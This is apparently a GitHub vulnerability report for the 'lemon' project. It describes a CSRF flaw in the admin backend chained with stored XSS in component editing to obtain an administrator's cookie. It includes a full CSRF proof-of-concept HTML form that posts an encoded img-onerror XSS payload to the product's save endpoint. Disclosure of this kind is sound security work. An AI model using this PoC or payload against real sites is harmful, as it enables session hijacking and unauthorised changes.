xuhuisheng/lemon

Csrf + Xss combination Can be obtained user cookie

unknownerror-bot opened this issue · 0 comments

unknownerror-bot commented

Product Homepage: http://www.mossle.com/index.do
Place of backstage exists Csrf Vulnerability,attacker Structure a csrf payload,Once the administrator clicks on the malicious link, the component information is automatically add.
There is an xss in the place of Editing component

1571127417546

We can write an xss first, and then construct the csrf code, so that after the account clicks on the malicious link of the attacker, it will execute csrf, and the website will have an xss. As long as the account visits the page , he can get him Cookie

Csrf Exp:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://www.mossle.com/portal/save.do" method="POST">
      <input type="hidden" name="portalWidgetId" value="5557079425024" />
      <input type="hidden" name="portalItemName" value="&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;&apos;cookie&apos;&#41;&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

1571127847476